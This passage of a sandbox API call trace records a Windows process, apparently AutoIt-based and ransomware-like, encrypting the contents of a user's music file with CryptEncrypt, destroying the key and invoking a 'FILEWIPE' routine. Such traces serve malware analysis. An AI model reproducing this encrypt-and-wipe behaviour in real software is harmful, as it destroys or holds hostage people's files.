pbData=0x7da2c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0038.088] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.088] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.088] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.088] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.088] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.088] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.088] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.088] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.088] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0038.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.088] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.088] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.088] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.088] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.089] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.089] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.089] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.089] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.089] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0038.089] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.089] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.089] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x56c1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x56d0) returned 1 [0038.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.089] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.090] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.090] CharLowerBuffW (in: lpsz="byte[22225]", cchLength=0xb | out: lpsz="byte[22225]") returned 0xb [0038.090] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.090] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.090] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.090] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.090] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.090] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xad0488*, pdwDataLen=0x6ae220*=0x56c1, dwBufLen=0x56d0 | out: pbData=0xad0488*, pdwDataLen=0x6ae220*=0x56d0) returned 1 [0038.091] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.091] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.091] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.091] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.091] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.091] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.091] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0038.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.091] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.091] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.091] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.091] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0038.091] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.091] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.091] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.091] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.091] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0038.092] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.094] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.094] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.094] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.096] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.096] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.096] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0038.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.097] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.097] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.097] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0038.097] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.097] CryptDestroyKey (hKey=0x7c2280) returned 1 [0038.097] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.097] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.097] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0038.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.097] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.097] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.097] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.097] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.097] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.098] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.098] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0038.098] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.098] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.098] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.098] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.098] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.098] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0038.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.098] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.098] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.098] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.098] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.098] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.098] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0038.099] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.099] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.099] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0038.099] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.099] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0038.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0038.099] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.099] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.099] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0038.099] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.099] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.099] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.099] FreeLibrary (hLibModule=0x754b0000) returned 1 [0038.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0038.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0038.099] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.099] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.099] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.099] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.100] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.100] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0038.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0038.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.100] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0224c0, ftCreationTime.dwHighDateTime=0x1d5c521, ftLastAccessTime.dwLowDateTime=0xddf610, ftLastAccessTime.dwHighDateTime=0x1d5b5a7, ftLastWriteTime.dwLowDateTime=0xddf610, ftLastWriteTime.dwHighDateTime=0x1d5b5a7, nFileSizeHigh=0x0, nFileSizeLow=0x56c1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="SvUMdBH5SwJrEWp.m4a", cAlternateFileName="SVUMDB~1.M4A")) returned 0x7c2240 [0038.100] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.100] HeapFree (in: 